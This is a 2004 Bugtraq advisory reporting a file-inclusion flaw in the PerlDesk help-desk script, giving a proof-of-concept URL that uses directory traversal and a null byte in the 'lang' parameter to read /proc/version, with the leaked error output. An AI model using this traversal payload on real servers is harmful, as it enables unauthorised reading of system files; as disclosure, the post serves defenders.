[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Posible Inclusion File in Perl Desk
From:       Nikyt0x Argentina <nikyt0x () hotmail ! com>
Date:       2004-09-12 18:28:36
Message-ID: 20040912182836.10080.qmail () www ! securityfocus ! com
[Download RAW message or body]



Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox

[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com

[Information]

PerlDesk is a feature packed web based help desk and email management application \
designed  to streamline the operation of managing emails or support requests, with \
built in tracking  and response logging it is an ideal help desk solution for \
companies with one or more members  of staff or for those who want to organise client \
support.

[Bug]

Bug is in Inclusion in lang. 

Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z

Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods \
/etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux /usr/lib/perl5/site_perl/5.8.0 \
/usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.0/i686-linux \
/usr/lib/perl5/vendor_perl/5.8.0 /usr/lib/perl5/vendor_perl \
/usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0 /usr/local/lib/site_perl .) at \
/home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56. 

But if you use: pdesk.cgi?lang=[file]%00 :

Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
syntax error at include/lang/../../../../../../../proc/version line 1, near "2.4.21 \
(" Compilation failed in require at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi \
line 56. 

If you read error, you can see Version of Kernel "2.4.21".
...I love this game...


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic